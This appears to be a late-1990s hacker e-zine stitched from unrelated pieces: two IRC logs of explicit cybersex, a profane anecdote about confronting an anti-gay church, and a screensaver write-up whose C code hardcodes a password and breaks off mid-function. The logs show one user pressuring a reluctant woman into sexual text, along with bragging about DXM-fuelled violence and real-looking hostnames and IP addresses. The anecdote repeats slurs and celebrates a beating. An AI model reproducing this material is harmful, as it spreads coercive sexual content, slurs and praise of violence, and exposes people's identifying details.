[msg(asphxia)] HEH ok chrak it happened to me too :\ ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #atlantaga ³ server : irc.emory.edu ([170.140.4.6] Emory University) hey do0d ùíù SignOff rachel_: #falon (Ping timeout: 240 seconds) [msg(asphxia)] msg me plz HEH [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a] [#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a] [msg(asphxia)] ok [asphxia(bg0124a@216.76.138.90)] nm [msg(asphxia)] hehe [msg(asphxia)] heh [asphxia(bg0124a@216.76.138.90)] deal is off [msg(asphxia)] huh ?? [Falon(~Falon@x2-11.cosmoaccess.net)] hey [msg(asphxia)] huh ? [msg(asphxia)] HEH!! [msg(asphxia)] why HEH ? [msg(falon)] hi ùíù Ending conversation with asphxia OMG she just said 'deal is off' fucking [msg(asphxia)] HEH the server died HEH!!!!! [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a] [#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a] fucki ng ahahaha [msg(asphxia)] HEH damnbitch slut ùíù You're not opped on #falon EH HEh BAN asphxia i dont need [msg(asphixa)] HEH!! asphixa: No such nick/channel she said [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak ][sean@cpwright.com ] [n/a] [#falon ][ chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@liquidhex][ketamine@nw50.netwave.ca ] [n/a] [#falon ][ raychel- ][nobans@171-170-154.ipt.aol.com ] [n/a] HEH [msg(asphxia)] HEH she said she would cyber me and wastes like 20 mniutes of my tyime HEh its not like its sex HEH! 
where she haz a right to say no HEH. if i agree that iz HEH [asphxia(bg0124a@216.76.138.90)] hey ð asphxia licks your inner thigh [msg(asphxia)] HEH Werd up ? HEh ohh nm hahah she startsed agian HEH ùíù Starting conversation with asphxia hehe ok [msg(asphxia)] heh ð -> chrak_/asphxia likes ur outer pussy lips HEH [Falon(~Falon@x2-11.cosmoaccess.net)] hmm [asphxia(bg0124a@216.76.138.90)] mmmmm ð asphxia fingers her pussy [Falon(~Falon@x2-11.cosmoaccess.net)] you are really strange [asphxia(bg0124a@216.76.138.90)] mmmm [msg(asphxia)] HEH r u really getting off HEH [msg(asphxia)] HEH there ð -> chrak_/asphxia resumes whacking off HEh continue talking plz HEH! ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #Dr00gz got rid of a few potential hazards fer ya too HEH! rpc. daemons erm wrong damn channel i must go I've done like 8 math assignments today BABY HEH! [msg(raychel-)] HEH by bye! [raychel-(nobans@171-170-154.ipt.aol.com)] bye :D [raychel-(nobans@171-170-154.ipt.aol.com)] ill bbi like 30 [msg(asphxia)] HEH [raychel-(nobans@171-170-154.ipt.aol.com)] i just hafta make a call LD [raychel-(nobans@171-170-154.ipt.aol.com)] er :D [msg(raychel-)] HEH ok damn asphxia sux at this shes slooooow typer HEH [msg(asphxia)] HEH r u just [msg(asphxia)] doing this [raychel-(nobans@171-170-154.ipt.aol.com)] hahha [raychel-(nobans@171-170-154.ipt.aol.com)] ok [msg(asphxia)] to piss me off HEHEH!! [msg(asphxia)] like [msg(asphxia)] HEH. [raychel-(nobans@171-170-154.ipt.aol.com)] later ùíù SignOff raychel-: #falon (Giving in won't stop the noise.) [msg(asphxia)] start making me whack off [msg(asphxia)] then [msg(asphxia)] stop [msg(asphxia)] talking HEH! 
[msg(asphxia)] HEH me [msg(asphxia)] begins [msg(asphxia)] to ð asphxia strokes her pussy with one hand and your phat cock [asphxia(bg0124a@216.76.138.90)] with the other ùíù mode/#falon [+o chrak_] by Falon ð -> chrak_/asphxia moans HEH ð asphxia wants you to put your hand in her pussy [asphxia(bg0124a@216.76.138.90)] shit ph1x is on ð -> chrak_/asphxia puts his hand ALL the way up there HEH! ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #falon ð asphxia still wants you though HEH!@#$ ð asphxia starts to get wet [msg(asphxia)] HEH ok ignore him HEH!! chrak ùíù ph1x [sickmade@01-029.009.popsite.net] has left #falon [] [msg(ph1x)] wait like 5 minutes ok HEH ? [ph1x(sickmade@01-029.009.popsite.net)] HEH [ph1x(sickmade@01-029.009.popsite.net)] FOR WHAT? [ph1x(sickmade@01-029.009.popsite.net)] HEH! [ph1x(sickmade@01-029.009.popsite.net)] asphxia my women is on [ph1x(sickmade@01-029.009.popsite.net)] HEH! [msg(asphxia)] HEH jsut ms me shit HEH cause im whacking off [ph1x(sickmade@01-029.009.popsite.net)] HEH!@#$ [ph1x(sickmade@01-029.009.popsite.net)] HEHAHHEHAH [msg(asphxia)] HEH ph1x is here yes HEH hurry up HEH! 
[msg(asphxia)] im looking at pr0n so it wont take long HEH if i hurry ð asphxia licks the head of your dick [asphxia(bg0124a@216.76.138.90)] mmmmmmm [asphxia(bg0124a@216.76.138.90)] put it in me ð -> chrak_/ashxia puts it in u ashxia: No such nick/channel ð -> chrak_/asphxia puts it in u [asphxia(bg0124a@216.76.138.90)] mmm ð asphxia squeals [asphxia(bg0124a@216.76.138.90)] it feels sooo good ð -> chrak_/asphxia IZ APPROCHING ORGASM FROM THIS STUPID EXCUSE FOR SEX HEH@!@A!@ ùíù NetSplit: irc-e.frontiernet.net split from irc.exodus.net [03:37pm] ùíù BitchX: Press Ctrl-F to see who left Ctrl-E to change to [irc-e.frontiernet.net] [asphxia(bg0124a@216.76.138.90)] mmmmmm ð asphxia rides your big cock [asphxia(bg0124a@216.76.138.90)] ohhh [asphxia(bg0124a@216.76.138.90)] you feel how wet i am [msg(asphxia)] HEH yep ùíù SignOff ph1x: #dr00gz (Leaving) [asphxia(bg0124a@216.76.138.90)] mmmmm] ð asphxia purrs [asphxia(bg0124a@216.76.138.90)] fuck me hard [asphxia(bg0124a@216.76.138.90)] i want to feel you cum [msg(asphxia)] heh i am HEH [msg(asphxia)] im whacking off HEH!!! [asphxia(bg0124a@216.76.138.90)] you are? [msg(asphxia)] HEH YEP [msg(asphxia)] well [msg(asphxia)] ok [msg(asphxia)] HEH ð asphxia wants to feel you cum all inside her [msg(asphxia)] im fucking u HEH! [asphxia(bg0124a@216.76.138.90)] oooooh [msg(asphxia)] EHEH ok her we go [asphxia(bg0124a@216.76.138.90)] fuck me harder ð asphxia squeals ð asphxia turns over and inserts your cock into her tight ass ùíù asphxia [bg0124a@216.76.138.90] has joined #dr00gz [msg(asphxia)] hehe [msg(asphxia)] ok im almost cumming HEH hiya [msg(asphxia)] just type some more shit HEh [msg(asphxia)] and say [msg(asphxia)] 'ohh chrak HEH' [msg(asphxia)] like moan it HEH!!!! 
ùíù SignOff liquidhex: #dr00gz,#falon (Ping timeout) [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] ùíù BitchX: Ambiguous command: F [msg(asphxia)] f ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : #dr00gz ³ server : irc.emory.edu ([170.140.4.6] Emory University) ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #falon [asphxia(bg0124a@216.76.138.90)] ohhh crack HEH ùíù ph1x [sickmade@01-029.009.popsite.net] has joined #dr00gz [asphxia(bg0124a@216.76.138.90)] fuck me harded [msg(asphxia)] heh [msg(asphxia)] ij [asphxia(bg0124a@216.76.138.90)] your cock feels sooo good in my asss [asphxia(bg0124a@216.76.138.90)] mmmm hmMmmmm [msg(asphxia)] ur ass is about to get like [msg(asphxia)] filled up with cum HEH@ [msg(asphxia)] !! ð asphxia rubs her clit [asphxia(bg0124a@216.76.138.90)] yum ð asphxia cannot wait [msg(asphxia)] HEH keep talikng im almost done HEH!!! [msg(asphxia)] HEH keep talikng im almost done HEH!!! [msg(asphxia)] HEH keep talikng im almost done HEH!!! ð asphxia rides your phat cock [asphxia(bg0124a@216.76.138.90)] mmmmm [asphxia(bg0124a@216.76.138.90)] fuck me hard ð asphxia puts a hand inside her hot pussy [asphxia(bg0124a@216.76.138.90)] i want to feel you come [msg(asphxia)] HEH ð -> chrak_/asphxia pinching ur nipz HEH!@ [asphxia(bg0124a@216.76.138.90)] uuum 3:45pm up 4 days, 2:28, 3 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT descende ttyp3 ron-ny13-22.ix.n 3:28pm 9:27 0.16s 0.16s -bash sean ttya1 dialup28:S.0 2:38pm 0.00s 8.86s 8.86s BitchX chrak cpwright ttyp1 sls17.asb.com 3:28pm 1:09 0.38s 0.05s talk sean [asphxia(bg0124a@216.76.138.90)] don't sto[ [asphxia(bg0124a@216.76.138.90)] p [msg(asphxia)] heh [msg(asphxia)] no u dont stop HEH im the on whacking off HEH!! ð -> chrak_/asphxia places it in ur mouth HEH. anyone hERE? 
ð -> chrak_/asphxia wants a BJ HEH!!! ball sucking to oHEH!! wakeup asphxia [msg(ph1x)] hold on 5 minutes HEH! [ph1x(sickmade@01-029.009.popsite.net)] HEH ð asphxia rubs her tongue up and down your throbbing dick [ph1x(sickmade@01-029.009.popsite.net)] are you whacking off? [asphxia(bg0124a@216.76.138.90)] mmmm nope.. noone here ùíù mode/#dr00gz [+o ph1x] by irrupt ùíù mode/#dr00gz [+oo chrak_ asphxia] by ph1x chrak is whacking off HEH [msg(asphxia)] heh haha he keeps msg'ng me to holdon 5 mins shut up i am not HEH! [asphxia(bg0124a@216.76.138.90)] mmmm ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | asphxia (bg0124a@216.76.138.90) (unknown) ³ ircname : bree | channels : @#dr00gz ³ server : irc.emory.edu ([170.140.4.6] Emory University) ð asphxia sucks it hard um [asphxia(bg0124a@216.76.138.90)] in HEH [asphxia(bg0124a@216.76.138.90)] out yes you are [asphxia(bg0124a@216.76.138.90)] in out [msg(asphxia)] herhh [msg(asphxia)] ok du0d [msg(asphxia)] suck ma balsl HEH! yesterday was the worst trip i've ever had on dxm it sucked HEH! listen to this My mom was bitching me out calling me a robo junkie because I told her I drank a shitload of robotussn when infact I really took a bunch of pure dxm and I got really pissed off and punched a huge hole in the wall HEH! down by the stairs and I didnt even feel it ð asphxia wraps her mouth around your balls and sucks on them because dxm makes your body like numb' HEH! [msg(asphxia)] suck ma balsl HEH! I could have like karate chopped through metal [msg(asphxia)] HEH ok ph1x [msg(asphxia)] HEH ok im about to like jizz atnd shti HE Hkeep sucking ! yes? ð asphxia sucks them hard ð asphxia wraps her hand around your cock hiya bebe I can't beleive I actually thought I could act normal in front of my parents on 800mg HEH! 
[asphxia(bg0124a@216.76.138.90)] mmmmmmm HELLO BREE hi bebe kiss [msg(asphxia)] ok * >ph1x #dr00gz strips dravyn naked and gets out his whip and handcuffs [msg(asphxia)] hurry im hgonna finnish in like 30 seconds HEH HEH [msg(asphxia)] so keep typing HEH! you ready for an orgy of pain? ð asphxia pulls on your phat cock [asphxia(bg0124a@216.76.138.90)] mmmmm [asphxia(bg0124a@216.76.138.90)] feels so good [asphxia(bg0124a@216.76.138.90)] i want to feel you cum [asphxia(bg0124a@216.76.138.90)] baby [asphxia(bg0124a@216.76.138.90)] heh HEH!? yes [msg(asphxia)] HEH ALMOST from you always Do you like bondage? [msg(asphxia)] GWG me niot phix HEH! [msg(asphxia)] its annoying to stop and start HEH!! ð asphxia wants you to come baby [asphxia(bg0124a@216.76.138.90)] mmmm ùíù mode/#falon [+o ph1x] by Falon [asphxia(bg0124a@216.76.138.90)] ohhhh [asphxia(bg0124a@216.76.138.90)] want to fuck [asphxia(bg0124a@216.76.138.90)] again [msg(asphxia)] HEH Ok ð asphxia puts your hot dick into her wet pussy [asphxia(bg0124a@216.76.138.90)] fuck me [msg(asphxia)] type fast HEH for like one minute HEH and then il lbe done HEH ð -> chrak_/asphxia starts pushing it in and out yeah [msg(asphxia)] HEH ur nort getting off to this too r u HEH . [msg(asphxia)] this works great with pr0n in front of u too HEH! ð asphxia fucks you hard ð -> chrak_/asphxia starts pushing it in and out ð -> chrak_/asphxia HE Halmost done hurry up and fuck HEH!! ð asphxia sucks onyour nipples [asphxia(bg0124a@216.76.138.90)] mmmmm ð asphxia 's muscles tighten [asphxia(bg0124a@216.76.138.90)] i am gonna cum [asphxia(bg0124a@216.76.138.90)] babe [msg(asphxia)] HEH good ð -> chrak_/asphxia me feels her puss contracting on his cock [msg(asphxia)] HEH type [msg(asphxia)] im looking at this like life size pic [msg(asphxia)] of [asphxia(bg0124a@216.76.138.90)] mmmmmmmmmm [msg(asphxia)] a woman cumming HEH! 
DMANIT HEH ð asphxia hope syou cummmmm join #hackerz asphxia HEH!@#$ [asphxia(bg0124a@216.76.138.90)] i am about to ð asphxia rams your cock into her wetpussy [asphxia(bg0124a@216.76.138.90)] oh baby ð -> chrak_/asphxia begins the final uhm HEH decent into pussy fuck land HEH! [asphxia(bg0124a@216.76.138.90)] harder4 [asphxia(bg0124a@216.76.138.90)] it feels too good ð asphxia moans [msg(asphxia)] HEH discribe ur pussy HEH! [msg(asphxia)] HEH almsot done HEH! [asphxia(bg0124a@216.76.138.90)] it is wet [asphxia(bg0124a@216.76.138.90)] and really deep [asphxia(bg0124a@216.76.138.90)] and filled up with your hot cock [asphxia(bg0124a@216.76.138.90)] mmm [msg(asphxia)] HEH ok [msg(asphxia)] im all done HEH! [asphxia(bg0124a@216.76.138.90)] oh [asphxia(bg0124a@216.76.138.90)] yes [asphxia(bg0124a@216.76.138.90)] harder [msg(asphxia)] HEH almsot done HEH! [msg(asphxia)] HEH [msg(asphxia)] all doe HEH [msg(asphxia)] u can help clean up my damn hand and pantz tho HEH! [asphxia(bg0124a@216.76.138.90)] mmmmmmmmmmmmm [msg(asphxia)] HEH [msg(asphxia)] ok [msg(asphxia)] danke HEH. [ Channel ][ Nickname ][ user@host ][ level ] [#falon ][@chrak_ ][~hmm@cpwright.com ] [n/a] [#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a] [#falon ][@ph1x ][sickmade@01-029.009.popsite.net ] [n/a] [msg(ph1x)] HEH hi [ph1x(sickmade@01-029.009.popsite.net)] hi [msg(ph1x)] HEH r u talking to asphxia ? ...........................LOG ON [ph1x(sickmade@01-029.009.popsite.net)] YeZ ùíù intruderx [haxor@al8-p56-zg.tel.hr] has joined #dr00gz [msg(ph1x)] ohh. ùíù mode/#dr00gz [+o intruderx] by ph1x [msg(ph1x)] HHE abpit what ? OK hi IRC log ended Tue Feb 23 16:01:19 1999 ------------------------------------------------------------------------------- HEH zero d4y. no d1str0. i could describe how i usually give head, if and when i do do it then. just using /me g0d im going to be here all night. if that would work well? haha if you keep complaining, you can just /part you know.. no we have an agreement. 
you are getting lag bursts again and why do i have to use /me ? because well you don't /me just makes it all better i guess. what if i don't want to use /me? hm then don't just get to the cybering this is weird :\ i'll just describe how i gave my ex head, i guess k. i used to kinda suprise him, and when he was sitting in his chair talking on IRC, I would unzip his pants and kinda kneel between his legs I DON'T WANNA DO THIS THIS IS GAY you have to. du0d and you can't tell a fucking story :\ wtf i wasn't done you gotta describe it like u were doing it to me jesus why? i'm not doing it to you tahtz what cyber head is tahtz what cyber head is tahtz what cyber head is i haven't done it to you and i prolly won't even ever meet you du0d sigh will u just do it fine :\ use /me or something but make it sound like erotic i hate you. :\ HEH oh well. your end of the bargain. I didn't even agree i said i would think about it wtf you said "FINE" meaning "ok i will" meaning "yes" making it an affirmation of your agreement. OK now do it WHATEVER fucking op everyone you deopped ð sek kneels between your legs and unzips your pants yeah ð sek pulls out your dick and starts to play with it keep going... .. ð sek licks the very tip of it, and runs her tongue down to the very bottom jea. ð sek sucks a little on the head of your dick ð sek begins to move her mouth up and down slowly, deepthroating ð sek starts to move a little faster word. ð sek waits until you cum in her mouth, then pulls back and swallows there, happy? :\ no keep going SIGH im not a minute man! why not? i'm done :\ um ur done when like i say ur done there is only so much you can describe over irc thats the way it works heh u can get more descriptive think of new creative ways before i lose th1z m4ss1ve er3ct10n sigh er, you got hard from that? no. thasts the problem!@#$ i should get hard from that hahah now then start g1bing head eep, my bf just got on irc future bf, anyways :P i dont care this chan is +s now then. 
hm i do, i'm talking to him :\ well just give me some more cyber head and dont tell h1m or if u wish ill tell him HEH. i dont care. i thought i did a decent job of giving head over irc :\ u gotta finish your part of the agreement. you did but ur not done yet. you don't even know who he is well how much more can i say? just keep talking about u giving me head using /me and get real descriptive about it and dont finish till i say its done jeesh i dunno how much more i can say :\ i like to deepthroat just start over and instead of finishing sigh keep going how hard iz that. hEh. I have no clue what to say though! make stuff up as u go along. like ab0ut my long koq and stuff hEH! haha i dunno if its that long though ;) yeah well just start over and keep going and ill um cheer u on from 'above' heh3ha hahaha, my future-bf just called you a "fuqn wanker" bwahaha heh. well fuqn start! u gotta finish ur end of the deal jesus chr1st. fine ð sek sighs i did i gave you irc head um not really it lasted like what 15 seconds/ irc head is technically at least 4 minutes long last i checked irc head rfc HEH um, actually i did :\ just start over and do it again, god damnit. heh this is great. i can't help it if i can't be that descriptive well do it again. i dunno what to say try harder. just imagine what u'd do irl ! then describe it er heh. sigh fine word more irc head. th1z iz to elite. ð sek starts to play with your dick with her fingers, rubbing your head a little h3h. ð sek puts your whole dick in her mouth, and sucks softly ð sek moves up, and starts to suck on just your head ð sek runs her tongue over your dick, flicking it softly damn ð sek deepthroats again, and sucks hard and she s4id she didn't know how HEHh boy u like deepthroating alright. h4hahj th1z is elite ð sek shrugs guys seem to like it and i'm good at it k. onward. also, if a guy cums in my mouth and i'm deepthroating, i don't taste it :P k. onward. l4nd h03. 
ð sek sucks a little harder, and rotates her head a little ð sek puts some poprocks in her mouth, and sucks a little more hEH wtf dat would burn no suq a little harder be0tch it doesn't jea well onward ho! kinda like ice t1ngly heh continue! btw what size cup do u wear hEH. 36D why? 36d? wow EH did gr1p give you new.jpg? :\ no. ok. haven't seen him in a few dayz now continue ð sek starts to move her head a bit faster, and suck a bit harder this is where i grab da back of ur head hEH ds just came up here ds/? datashark so continue! hEH er fine ð sek tongues your dick as she sucks d4mn skippy. ð sek moves even faster, sucking harder jea b1tch t3ll m3 h0w u luv it wh3n i gr4b ur h4ir and force u d33per HEH er TELL m3 h3h ð sek is deepthroating already :P ð sek can't go any deeper END - comp4ct = elite - END ---------------------------------------------------------------[revolution] How I literally got kicked out of the Eastern Baptist Church by schemerz Disclaimer : Incidents included are all fictionious in nature due to the shady recollection process after smoking a little bit too much hash. Gewf was pressing for shtuff and I had to give him something, and these incidents were funny, at least as I rem ember it. These accounts are somewhat factual, somewhat not, so I decided just to change the names and make it safe in case I get anything horribly wrong. Eastern Baptist Church is located in Topuka, the capital of the state Kansas. It's not a really big church, but they get in the news alot. Most of the time they leave their tact at home and picket funerals and concerts, most recently the funeral of Math ew Sheppard. (I think they are too chicken to picket the rob zomebie and korn concert in KC last night, kick ass concert btw, but that's another article... :) They are also responsible for web sites such as www.goddetestsfags.com. So they are really a fun bunch. Rush Limbough would have been proud. 
Reverend Fred Felps heads the crowd, who was a lawyer in a previous life, until one of his sons got out of the closet. Fred Felps then runs to the nearest Warmart to purchase a really bad white robe and calls himself a preacher. After being thrown out o f the Southern Baptist Church because of his faggot hating ways, he started his own church, the Eastern Baptist Church, which basically runs out of his own house along with 20-30 family members and close friends. They get supported by a lot of white powe r parties too. Although not all of the family is predominantly prejudgice, I have had the pleasure of meeting his grandson, Ben Felps, who happens to be a graduate student doing computer science at University of Kansas. Ben admins most of his granddaddy 's sites, including of course yours truly. Enough with the background. I have to explain why I had the urge of seeing one of these sermons of Fred, if not fucking it up and causing some serious mayhem: Almost 3 years ago I arrived in Kansas fresh off the boat, as they would say afer having a less than stellar high school career somewhere in South East Asia. Shortly after arriving into the university and being shipped off to this smelly little dorm room , I was introduced to Sam my new roomate. He drove me around, showing me stuff and I got to know him very well. We were just kicking it one weekend in september and started watching the tele, when channel 6 was doing a special of a concert held at a loc al community college. Turns out this composer was dying of AIDS, and someone was holding a concert in his name for being the talent as he is. (I can't remember this dood's name, but I remember listening to some of his stuff on the local university radio now. Truly a talent.) Caught out of the corner of the camera there were these doods holding up signs with slogans like "Anal Sex=Aids=Death", "Gay=Death of Ethics=Death of America" and of course, "God detests fags!". 
I was thoroughly bewildered at the sight of such signs, and proceeded to bug Sam about it. Shit like this at home just does not fly. It's not like asians have a strong tolerance of homosexuals or racial diversity, but they keep it to themselves and have the politeness to withhold their opinion at times of mourning, such as a concert displaying ones work as one dies of aids. Being the fuckwit 18 year old that I was, I suggested to Sam that we would head over and see one of their sermons and check out their reasoning, because neither of us can make any logical sense out of Fred's websites. So we called the church up, asked if it was an open sermon coming up. We stated that we weren't gonna cause trouble, and putting on my fakeist british accent, asked if we could attend. We were of co urse declined the opportunity, since it was a close church. Being the dumb motherfucker sam can be sometimes, we decided to crash the party instead. (He's getting married to the least sensible woman on this planet in a month, so WATCH OUT FOR DA KIDS) So we hoped into his girlfriends car (btw we chatted this woman up no more than one week before, and now three years latter sam is fucking marrying the woman... good god... time has past QUICKLY... oh and she lent him the car... Megan is so fucking co ol, prolly cause Sam is such a fucking pimp), and drove to Topuka. We arrived at the church shortly before the sermon begun, and walked in, saying we are looking for Ben. Ben came out shortly, trying to cover his blood soaked ass, saying that his grandd ad was holding a sermon. We talked abit, commenting a little about the upside down american flag hanging outside the church. He said he would attend to us shortly after the sermon. I put on the largest puppy dog eyes I could muster, and asked *very* po litely if I can attend the sermon. Since he was a ta in one of my computer science lab classes, he was sure I wasn't going to pull any shit. We got in, sat on a seat. 
The living room was packed, and Sam was kinda chickening out a little... "Maybe we shon't be here dood..." Little did I know he was one of the most articulate argurers I was ever gonna meet :) So the sermon went, the usual ch urch shit, yahdayahdayahda... the hymes, the prayers and all that... until about 45 minutes latter Sam woke me from deep slumber when Fred started preaching the evils of homosexuality. People started asking questions as he spoke, and he answered quite logically. The man was a lawyer I thought, most of them, like my dad, have a knack of conveying one side of reasoning and made it all encompassing. So I held up my hand, to which I was asked to speak. "Reverend Felps, I am new here, in this church and in this country. I don't quite understand why you seem to direct all your problems at one social group who a) pay more taxes per capita then most other minorites, b) are probably more educated as well ? How can any group contributing to the government and society in such a way be considered harmful ?" He muttered something ridiculous like telling me to get a haircut, which was when Sam (he's got hair down to his ass... I learned never ever to talk any shit about long hair around him) stood up and started his rhetoric :)... "Mr Felps, I would like to know why you are so proliferic about your projections on to gay people. It is quite entertaining, humorous even, that you would chose to broadcast your inner id feelings towards homosexuals on national television. " Most people got the joke, and gave us the evilest look they could muster. I must say most people would have backdowned and shut up at this point, but Sam, oh Sam... what can I say... Anyways, Mr Felps professed that he did not know what Sam meant. Sam : "Mr Felps, would you like to answer my friends question as to why you are targeting one of the more successful groups of minorites of this country ?" 
Felps : "I happen to think their lifestyle is a harmful influence to our youth in this country. I also happen to percieve that this country is being overran by faggots. Is there no more decency in this country ?" (applause by his crowd) "Mr Felps, as I recall correctly, the american society is firmly capitalist, meaning that each individual's success is based upon one's wealth. how would the lifestyle of a homosexual, one of success, good education and wealth be questionable to the yout h? " Felps : "As *I* recall correctly, the american society is firmly CHRISTIAN based. It is because of non-believers such as these homosexuals, that the youth today stem from the faith. That, is why I am opposed to them." Me : "But was it not in the new Testament itself that states that we should love our neighbours ?" Felps : "Ummmmm... Are you familiar with the book of Sodom ?" Sam : "Yes I am, and I am familiar with this line of arguement. You would state that the book of sodom states quite clearly that male-male sexual activites are forbidden and the only male-female copulation is deemed allowable by god. You would also stat e that the bible FIRMLY states that sex is a sacred act of god, and people should not abuse this power. You will also lead into the argument right here that AIDS and other sexually transmitted diseases was the repricusion of these acts." Felps : "You read my mind son. How would you chose to refute these claims. I am of course a man binded by faith, so please keep any arguements of the bible's validity to yourself. " Sam : "Okay... Homosexuality has been documented long since roman times. How come aids were to come around now?" Felps : "There are other sexual transmitted diseases that god has dispensed in his fury upon this planet. Unfortunately the devil has made the faggot strong in his ways, and they have not been disuaded." Me : "How about this ? It is nearly medically impossible for lesbians to contract aids. 
If god indeed try to make AIDS as a means of disuading homosexuality, why are a) more hetrosexuals affected ? b) why did he leave half the faggots off the list ? " Felps : "God is not fair, he chose to punish the whole of humanity for the crimes of the faggots. I have taken up the task of god to disuade all of humanity against the ways of faggots. Lesbians are evil too." One of us : "You still have not answered the questions we posed, could you please answer them now ? " Felps : "I have answered them son. God has other diseases to weaken his enemy. Aids is only one piece in his arsenal. Gonoerrha, syphillis, etc etc all attack sexually indecent men and women in some way or another." One of us : "Alright fair enough, how about this... If a person who is not sexually promiscous, then it is very unlikely that he or she gets infected with anything correct ? Is it possible that your god wants to disuade his people away from promiscious sex ? Has he not made a distinction between acts of love and acts of passion before ?" Felps :"God has made it very clear that sexual acts outside of wedlock are forbidden. " Me :"Mr Felps, where does it exactly in the bible say that wedlock has to between a man and a woman ?" Felps : (stammers some unintelligible... me and sam exchange evil grinning looks...) Me : "As a matter of fact, where in the bible does it define the man and the woman entity, biologically and psychologically ? If this premise is not made, then all your arguements against homosexuality is up to question." Someone in the crowd : "How is that ?" Sam : "Well it is quite easy to see that a gay couple can be enacting both the male and female parts of the relationship. With legislation allowing homosexuals to marry in Hawaii it is perfectly ethical for gays to be in bounds of christianity and still copulate. No ?" Someone in the crowd : (something like you fags or faggot loving liberals... something dumb like that... think it was Ben. 
)

Someone else in the crowd : (Leave if you don't like what we have to say, We don't like you anyways.)

Sam : "We are merely discussing the rhetoric in the bible, I personally made no attacks towards the validity of the good book, neither did my friend here. "

Some bitch in the crowd : "Shut up you people are full of it as it is!"

Me : "We were merely discussing with the *beloved* reverend the various interpretations of the bible over a fine comb."

We were asked to leave anyways :) In fact, we didn't leave quite yet until Sam got his answers from his questions. Sorely to say we were rather discouraged with our journey towards the interpretations of the bible. I personally ditched the cross and became a taoist instead. Oh well...

Fred was beaten up in the middle of Kansas City one day when he was picketing somewhere near the Plaza. HEH it was a sight to behold. He's wrong. I am right. HAHA

-!- -!- -!- -!- -!- -!- -!- bsaver overview -!- -!- -!- -!- -!- -!- -!- -!-
-i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i-

This little program, based off of Qytpos drugz2.c, has been turned into a lovely ncurses screen saver. Nice words, derogatory words, and most importantly; dill monkey words come up -- It's fun for the whole family.

We / I decided to just store the password in this line here.

    static char passwd[] = "dillmonkey" ;

if you can code just a teeny bit, you can change this to a macro. did i mention teeny? We also thought that perhaps you might want to accept a password via something prompting for a password at each session. Such might be accomplished by:

    static char passwd[20];
    ...
    printf("Enter password to use: ");
    scanf("%19s", passwd);   /* 19 characters + the terminating NUL fit in passwd[20] */

but the problem is, if you forget, you might as well reboot. Also, you can have it saved in perhaps a file .bsaver and open, fgets() from it, but remember the character length has to be 20! You can also merely use the passwd structure and use your login password via crypt() etc.
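A bounded way to take the password from a prompt or from a `.bsaver` file, as an added example that is not part of bsaver.c: a 20-byte buffer holds 19 characters plus the terminating NUL, so a `%20s` conversion could write one byte past it. The helper names `read_passwd`, `load_passwd` and `passwd_equal` are assumptions of this sketch.

```c
#include <stdio.h>
#include <string.h>

#define PASSWD_MAX 20   /* buffer size used in the article: 19 characters + NUL */

/* Read one line from `in` into buf (size bytes, NUL included).
 * Returns the password length, or -1 on EOF/error or when the line is
 * longer than size-1 characters. An over-long line is drained to its
 * newline so the tail cannot be taken as the next password attempt. */
int read_passwd(FILE *in, char *buf, size_t size)
{
    int c;
    size_t len;

    if (size == 0)
        return -1;
    if (fgets(buf, (int)size, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    len = strcspn(buf, "\n");
    if (buf[len] == '\n') {          /* whole line fit, strip the newline */
        buf[len] = '\0';
        return (int)len;
    }
    c = fgetc(in);                   /* no newline stored: peek at what follows */
    if (c == EOF || c == '\n')       /* line was exactly size-1 characters */
        return (int)len;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;                            /* discard the rest of the over-long line */
    buf[0] = '\0';
    return -1;
}

/* Load the saved password from a file such as .bsaver (first line only). */
int load_passwd(const char *path, char *buf, size_t size)
{
    FILE *f = fopen(path, "r");
    int n;

    if (f == NULL)
        return -1;
    n = read_passwd(f, buf, size);
    fclose(f);
    return n;
}

/* Compare without stopping at the first mismatching byte. */
int passwd_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b), i;
    unsigned char diff = (unsigned char)(la != lb);

    for (i = 0; i < PASSWD_MAX; i++) {
        unsigned char ca = i < la ? (unsigned char)a[i] : 0;
        unsigned char cb = i < lb ? (unsigned char)b[i] : 0;
        diff |= (unsigned char)(ca ^ cb);
    }
    return diff == 0;
}

int main(void)
{
    char stored[PASSWD_MAX], typed[PASSWD_MAX];

    /* Use the saved password if there is one, otherwise ask for it. */
    if (load_passwd(".bsaver", stored, sizeof stored) <= 0) {
        printf("Enter password to use: ");
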